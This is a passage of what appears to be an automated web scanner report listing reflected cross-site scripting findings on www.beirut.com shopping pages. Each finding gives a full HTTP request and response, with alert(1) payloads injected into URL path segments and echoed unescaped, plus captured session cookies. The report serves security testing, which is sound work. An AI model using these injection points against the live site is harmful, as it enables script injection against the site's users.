
GET /Shopping5b7d6'-alert(1)-'9921276be78/Consumer-Goods/235690923/Party-Supplies/25 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:48:00 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60257

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping5b7d6'-alert(1)-'9921276be78/Consumer-Goods/235690923/Party-Supplies/25';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.899. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Party-Supplies/25 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Party-Supplies/25

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e65e'-alert(1)-'6c866c85290 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Consumer-Goods9e65e'-alert(1)-'6c866c85290/235690923/Party-Supplies/25 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:53:02 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Consumer-Goods9e65e'-alert(1)-'6c866c85290/235690923/Party-Supplies/25';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.900. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Party-Supplies/25 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Party-Supplies/25

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4a2a9<script>alert(1)</script>c9760d71641 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Consumer-Goods4a2a9<script>alert(1)</script>c9760d71641/235690923/Party-Supplies/25 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:53:27 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56595

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Consumer Goods4a2a9<script>alert(1)</script>c9760d71641 <a href="#" id="backlink">
...[SNIP]...

4.901. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Party-Supplies/25 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Party-Supplies/25

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8faed'-alert(1)-'15ea2e93166 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Consumer-Goods/2356909238faed'-alert(1)-'15ea2e93166/Party-Supplies/25 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:57:54 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56551

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Consumer-Goods/2356909238faed'-alert(1)-'15ea2e93166/Party-Supplies/25';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.902. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Party-Supplies/25 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Party-Supplies/25

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e0ff'-alert(1)-'6fcc3fca66c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Consumer-Goods/235690923/Party-Supplies6e0ff'-alert(1)-'6fcc3fca66c/25 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:03:57 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56603

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Consumer-Goods/235690923/Party-Supplies6e0ff'-alert(1)-'6fcc3fca66c/25';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.903. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Party-Supplies/25 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Party-Supplies/25

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87eb4'-alert(1)-'3ee8c160343 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Consumer-Goods/235690923/Party-Supplies/2587eb4'-alert(1)-'3ee8c160343 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:07:28 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54890

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Consumer-Goods/235690923/Party-Supplies/2587eb4'-alert(1)-'3ee8c160343';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.904. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Pet-Store/71 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Pet-Store/71

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e0694'-alert(1)-'b7e2746b028 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shoppinge0694'-alert(1)-'b7e2746b028/Consumer-Goods/235690923/Pet-Store/71 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:25:06 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60224

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shoppinge0694'-alert(1)-'b7e2746b028/Consumer-Goods/235690923/Pet-Store/71';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.905. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Pet-Store/71 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Pet-Store/71

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d5a6"><a>c9df6134960 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping1d5a6"><a>c9df6134960/Consumer-Goods/235690923/Pet-Store/71 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:17:21 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping1d5a6"><a>c9df6134960">
...[SNIP]...

4.906. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Pet-Store/71 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Pet-Store/71

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8100'-alert(1)-'64d0a0677ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Consumer-Goodsb8100'-alert(1)-'64d0a0677ca/235690923/Pet-Store/71 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:29:05 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Consumer-Goodsb8100'-alert(1)-'64d0a0677ca/235690923/Pet-Store/71';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.907. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Pet-Store/71 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Pet-Store/71

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e011a<script>alert(1)</script>ffc19d6a723 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Consumer-Goodse011a<script>alert(1)</script>ffc19d6a723/235690923/Pet-Store/71 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:30:03 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55552

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Consumer Goodse011a<script>alert(1)</script>ffc19d6a723 <a href="#" id="backlink">
...[SNIP]...

4.908. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Pet-Store/71 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Pet-Store/71

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ea0c'-alert(1)-'db07250d556 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Consumer-Goods/2356909236ea0c'-alert(1)-'db07250d556/Pet-Store/71 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:35:08 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55504

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Consumer-Goods/2356909236ea0c'-alert(1)-'db07250d556/Pet-Store/71';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.909. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Pet-Store/71 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Pet-Store/71

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8e59'-alert(1)-'fff20812f1d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Consumer-Goods/235690923/Pet-Storee8e59'-alert(1)-'fff20812f1d/71 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:44:44 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55717

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Consumer-Goods/235690923/Pet-Storee8e59'-alert(1)-'fff20812f1d/71';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.910. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Pet-Store/71 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Pet-Store/71

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8924'-alert(1)-'7e34d20f629 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Consumer-Goods/235690923/Pet-Store/71c8924'-alert(1)-'7e34d20f629 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:48:12 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54864

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Consumer-Goods/235690923/Pet-Store/71c8924'-alert(1)-'7e34d20f629';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.911. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Roastary/78 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Roastary/78

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be4ec"><a>153e7342d83 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shoppingbe4ec"><a>153e7342d83/Consumer-Goods/235690923/Roastary/78 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
